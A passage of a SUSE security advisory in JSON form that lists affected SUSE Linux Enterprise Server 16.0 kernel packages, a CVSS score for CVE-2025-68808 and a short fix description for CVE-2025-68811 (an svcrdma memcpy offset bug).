"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68808"
},
{
"cve": "CVE-2025-68811",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68811"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsvcrdma: use rc_pageoff for memcpy byte offset\n\nsvc_rdma_copy_inline_range added rc_curpage (page index) to the page\nbase instead of the byte offset rc_pageoff. Use rc_pageoff so copies\nland within the current page.\n\nFound by ZeroPath (https://zeropath.com)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
